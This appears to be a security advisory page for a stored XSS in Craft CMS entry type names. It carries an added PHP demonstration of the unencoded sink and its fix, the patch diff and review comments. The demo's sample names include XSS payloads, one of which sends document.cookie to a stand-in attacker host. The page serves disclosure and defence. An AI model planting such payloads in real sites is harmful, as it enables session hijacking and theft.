Craft has a Stored XSS in Entry Types Name
Description
Craft is a platform for creating digital experiences. From 5.0.0-RC1 to 5.8.21, Craft has a stored XSS via Entry Type names. The name is not sanitized when displayed in the Entry Types list. This vulnerability is fixed in 5.8.22.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Craft CMS 5.0.0-RC1 through 5.8.21 contains a stored XSS vulnerability in Entry Type names, fixed in 5.8.22 by HTML-encoding the name when the Entry Types list is rendered.
Craft CMS versions 5.0.0-RC1 through 5.8.21 are affected by a stored cross-site scripting (XSS) vulnerability in the Entry Type name field. The name is not encoded when displayed in the Entry Types list within the control panel, so an attacker who can set the name can inject arbitrary JavaScript that executes in the browsers of other users who view the list [1]. The root cause is missing output encoding at the sink: in Entries::getTableData() the label returned by getUiLabel() was passed straight into Html::a() and on to Cp::chipHtml() as labelHtml, both of which treat their input as ready-made markup. The fix in commit cfd6ba0 wraps the label in Html::encode() before it is used there [4].
To exploit this vulnerability, an attacker must have the ability to create or edit Entry Types—typically a user with administrative or content management privileges. When the malicious name is saved, any user who views the Entry Types list (including other administrators) will trigger the injected script. No additional authentication bypass is required, but the attacker must have a valid account with sufficient permissions [1][2].
Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser within the Craft control panel session. This can lead to session hijacking, unauthorized actions performed on behalf of the victim, data exfiltration, or defacement of the admin interface. The impact is limited to the control panel context, but given the elevated privileges of typical viewers, the risk is significant [1].
The vulnerability is fixed in Craft CMS version 5.8.22, released on 2026-02-09 [2]. Users running any affected version (5.0.0-RC1 through 5.8.21) should upgrade immediately. No workarounds are documented; the only mitigation is applying the patch [4].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
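The sink described above, as an added example that is not Craft's code: a minimal model of the label rendering in Entries::getTableData(), run once without and once with the one-line fix, over constructed entry type names. The helpers a() and encode() are stand-ins for the Yii/Craft Html::a() and Html::encode() they imitate (Yii's encode() wraps htmlspecialchars() with the flags used here), and the names, URLs and attacker host are made up for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example, not code from Craft CMS: a minimal model of the sink in
// Entries::getTableData() showing why the unencoded entry type name is a
// stored XSS and how encoding at the sink (the cfd6ba0 fix) neutralises it.
// Helper names, entry type names and URLs below are constructed for this demo.

// Stand-in for Html::a($text, $url, $options): like the Yii/Craft helper it
// models, $text is treated as ready-made HTML and is NOT encoded; only the
// href and attribute values are.
function a(string $text, string $url, array $options = []): string
{
    $attrs = '';
    foreach ($options as $attr => $value) {
        $attrs .= ' ' . $attr . '="' . encode((string) $value) . '"';
    }
    return '<a href="' . encode($url) . '"' . $attrs . '>' . $text . '</a>';
}

// Stand-in for Html::encode(): Yii's version wraps htmlspecialchars() with
// these flags, so <, >, &, " and ' all become entities.
function encode(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render one row's label chip the way the list view does, with or without the fix.
function renderLabel(string $name, string $editUrl, bool $patched): string
{
    $label = $patched ? encode($name) : $name;   // the one-line difference in the patch
    return '<div class="inline-chips">' . a($label, $editUrl, ['class' => 'label-link']) . '</div>';
}

// Constructed entry type names; the last two are what an attacker with
// permission to edit entry types could save.
$entryTypes = [
    ['name' => 'Article', 'url' => 'https://cms.example.test/admin/settings/entry-types/1'],
    ['name' => 'Q&A <beta>', 'url' => 'https://cms.example.test/admin/settings/entry-types/2'],
    ['name' => 'News<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
     'url' => 'https://cms.example.test/admin/settings/entry-types/3'],
    ['name' => '<script>alert(document.domain)</script>',
     'url' => 'https://cms.example.test/admin/settings/entry-types/4'],
];

foreach ($entryTypes as $et) {
    $before = renderLabel($et['name'], $et['url'], false);
    $after  = renderLabel($et['name'], $et['url'], true);

    // Count opening tags: the only ones that should survive are the two we
    // built ourselves (<div> and <a>); anything more came from the name.
    $tagsBefore = preg_match_all('/<[a-z]/i', $before);
    $tagsAfter  = preg_match_all('/<[a-z]/i', $after);

    printf("%-60s before: %d tag(s)  after: %d tag(s)\n", $et['name'], $tagsBefore, $tagsAfter);
    assert($tagsAfter === 2, 'patched output must contain only the div and the anchor');
    // The encoded label still shows the original characters once the browser decodes it.
    assert(html_entity_decode(encode($et['name']), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') === $et['name']);
}
```

Run with php on a file containing the block. The lesson is the contract of the sink: a parameter that takes HTML (a positional text argument to Html::a(), an option named labelHtml) puts the encoding burden on the caller, so the raw name must be encoded exactly once, at the point where it becomes markup, and any other place that feeds user-editable names into such a parameter needs the same treatment. Because the patch only changes output, names saved while an affected version was running are still in the database unchanged after upgrading; they now render inertly in this list, but they are worth reviewing as part of applying the fix.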
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| craftcms/cms | Packagist | >= 5.0.0-RC1, < 5.8.22 | 5.8.22 |
Patches
2 files changed · +2 −1
CHANGELOG.md+1 −0 modified@@ -14,6 +14,7 @@ - Fixed a bug where object templates that included another template were missing variables. ([#18165](https://github.com/craftcms/cms/issues/18165)) - Fixed a JavaScript error that could occur if two control panel animations were triggered simultaneously. - Fixed a bug where it wasn’t possible to copy/paste nested entries within Matrix fields set to the inline-editable blocks view mode, for unpublished owner elements. ([#18185](https://github.com/craftcms/cms/pull/18185)) +- Fixed an XSS vulnerability. (GHSA-7pr4-wx9w-mqwr) ## 5.8.21 - 2025-12-04
src/services/Entries.php+1 −1 modified@@ -1961,7 +1961,7 @@ public function getTableData( $usages = $this->allEntryTypeUsages(); foreach ($entryTypes as $entryType) { - $label = $entryType->getUiLabel(); + $label = Html::encode($entryType->getUiLabel()); $chipCellContent = Html::beginTag('div', ['class' => 'inline-chips']) . Cp::chipHtml($entryType, [ 'labelHtml' => Html::a($label, $entryType->getCpEditUrl(), [
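Review bot: the Html::encode() on the $label line in src/services/Entries.php is the right sink fix, since Html::a($label, ...) treats its first argument as markup and the result goes to Cp::chipHtml() as labelHtml, but this hunk only covers the one label in getTableData(); please grep for other labelHtml consumers that are fed getUiLabel() or another user-editable name and confirm each is encoded, or, if Cp::chipHtml() accepts a plain-text label option, pass that instead so the helper owns the encoding. A regression test that saves an entry type named <b>x</b> and asserts the table HTML contains &lt;b&gt; would keep this from reappearing.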
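Review bot: the new CHANGELOG.md line says only "Fixed an XSS vulnerability. (GHSA-7pr4-wx9w-mqwr)"; consider naming the affected surface (entry type names in the Entry Types list) so operators scanning the changelog can judge their exposure without opening the advisory.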
References
- https://github.com/advisories/GHSA-7pr4-wx9w-mqwr (GitHub advisory)
- https://nvd.nist.gov/vuln/detail/CVE-2026-25491 (NVD record)
- https://github.com/craftcms/cms/commit/cfd6ba0e2ce1a59a02d75cae6558c4ace1ab8bd4 (fix commit)
- https://github.com/craftcms/cms/releases/tag/5.8.22 (release)
- https://github.com/craftcms/cms/security/advisories/GHSA-7pr4-wx9w-mqwr (vendor advisory)